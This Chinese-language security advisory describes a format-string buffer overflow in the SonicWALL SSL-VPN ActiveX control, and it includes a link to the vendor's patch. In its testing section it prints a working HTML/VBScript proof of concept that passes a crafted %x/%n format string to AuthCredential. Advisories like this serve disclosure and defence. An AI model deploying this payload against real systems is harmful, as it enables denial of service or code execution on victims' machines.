发布日期：2010-08-19
更新日期：2010-08-20

受影响系统：

SonicWALL SSL-VPN EX Series 10.5.1
SonicWALL SSL-VPN EX Series 10.0.4

描述：

---

SonicWALL SSL-VPN可以为企业网络提供简单易用的VPN解决方案。

SonicWALL SSL-VPN所安装的End-Point Interrogator/Installer ActiveX控件没有正确地验证传送给AuthCredential函数的格式串参数，用户受骗访问了恶意网页就可能触发缓冲区溢出，导致拒绝服务或执行任意代码。ConfigurationString函数中也存在这个漏洞，但要求格式串必须为base64编码。

<*来源：Nikolas Sotiriu
  
  链接：http://marc.info/?l=full-disclosure&m=128220433528119&w=2
        http://secunia.com/advisories/41026/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
  <title>SonicWALL E-Class SSL-VPN ActiveX Control DoS PoC</title>
</head>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png">

<input type=button name="Submit" VALUE="Rule #5 – Shoot First">


</pre>

<object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D'
id='obj'></object>

<script language='vbscript'>

Sub Submit_OnClick
    eax=String(2, unescape("%u6161"))
    arg="%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"
        'EAX 61616161

    buf=eax+arg

    obj.AuthCredential = buf
End Sub

</script>
</body>
</html>

建议：

---

厂商补丁：

SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.sonicwall.com/us/support/kb.asp?kbid=8272

浏览次数：3284
严重程度：0（网友投票）